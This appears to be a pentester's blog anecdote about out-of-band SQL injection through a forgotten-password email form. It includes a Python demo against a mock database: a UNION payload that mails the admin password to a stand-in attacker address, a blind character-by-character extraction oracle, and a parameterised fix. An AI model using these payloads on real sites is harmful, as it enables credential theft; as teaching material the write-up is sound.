One of our salespeople was going to sell a vulnerability assessment / management solution to a customer.
The customer was very confident about their server, since they had nothing open to the Internet except port 80. Also, many vendors/SIs had already approached them and had scanned it many times already.
OK. Port 80.
It seems there isn't much for an OS / service scanner to do. This test finally fell into a web application assessment.
So I launched a web application scanner against the server. There was nothing interesting except a form designed to send an email for a forgotten password. All of the forms on this web site were designed with input validation checks, except this little pop-up window. Then the SQL injection game was played.
The advanced skill in this case is that the result is not shown in an error message in the web browser. If your SQL statement runs, it sends an email to notify the user about the forgotten password. So what I did was get the result by making it send the email to myself.
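To make the out-of-band trick concrete, here is an added example (not code from the original post or from the site that was tested) in Python with SQLite. It assumes a hypothetical "forgot password" handler that looks up the account's email by username, splices the submitted username straight into the query, and mails a reset notice to whatever address the query returns; the schema, the users table contents, the attacker address and the Mailer stand-in for SMTP are all constructed for the example. Because the browser never shows the query result, the email itself becomes the channel: a UNION payload sets the recipient to the tester's address and puts another column's value into the message body, and when the body is not useful, whether a mail arrives at all serves as a yes/no oracle, which the last function uses to recover a value one character at a time. The parameterised handler beside it shows the fix.

```python
import sqlite3

ATTACKER = "attacker@evil.example"   # assumption: an address the tester controls


def make_db():
    """Constructed in-memory stand-in for the site's user table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.com", "alice-pass-1"),
        ("admin", "admin@example.com", "admin-pass-9"),
    ])
    return conn


class Mailer:
    """Stand-in for SMTP: records (recipient, body) instead of sending anything."""
    def __init__(self):
        self.sent = []

    def send(self, to, body):
        self.sent.append((to, body))


def forgot_password_vulnerable(conn, mailer, username):
    # The bug: the submitted username is concatenated into the SQL text.
    sql = f"SELECT email, username FROM users WHERE username = '{username}'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return None          # the browser only ever sees "request received"
    to, shown_name = row
    mailer.send(to, f"Password reset for {shown_name}")
    return to


def forgot_password_fixed(conn, mailer, username):
    # The fix: a bound parameter, so the input can never change the query shape.
    row = conn.execute(
        "SELECT email, username FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    to, shown_name = row
    mailer.send(to, f"Password reset for {shown_name}")
    return to


# Direct exfiltration: no row matches 'x', so the UNION row is the one mailed.
# The recipient becomes the tester, and the admin password lands in the body.
PAYLOAD = (f"x' UNION SELECT '{ATTACKER}', password FROM users "
           "WHERE username = 'admin' -- ")

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789-"


def mail_oracle(handler, conn, mailer, condition):
    """Submit a payload that mails the tester only if `condition` is true
    for the admin row; mail arrival is the only signal the tester gets."""
    before = len(mailer.sent)
    payload = (f"x' UNION SELECT '{ATTACKER}', 'probe' FROM users "
               f"WHERE username = 'admin' AND ({condition}) -- ")
    handler(conn, mailer, payload)
    return len(mailer.sent) > before


def recover_admin_password(handler, conn, mailer, max_len=32):
    """Blind, out-of-band recovery of the admin password, one character per
    run of the oracle. Stops when no character in CHARSET matches."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if mail_oracle(handler, conn, mailer,
                           f"substr(password, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break            # end of string (substr returned '')
    return recovered


if __name__ == "__main__":
    conn, mailer = make_db(), Mailer()
    print("direct:", forgot_password_vulnerable(conn, mailer, PAYLOAD), mailer.sent[-1])
    print("oracle:", recover_admin_password(forgot_password_vulnerable, conn, Mailer()))
    print("fixed :", forgot_password_fixed(conn, Mailer(), PAYLOAD))
```

The oracle variant is slow (one request per character guess) but it works even when the application mails nothing but a fixed template; all it needs is an SQL condition that decides whether a row comes back. Against the fixed handler the same payloads return no row and send no mail.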
Agree or not, it seems the penetration test in most cases has not much to test except web testing. And web testing has not much to do except input validation, or you go straight to testing for SQL injection problems.
Human mistakes in the application design give the hacker a happy venue to succeed.
So, as long as port 80 is still open, employ your expertise in web hacking and you are on the way.
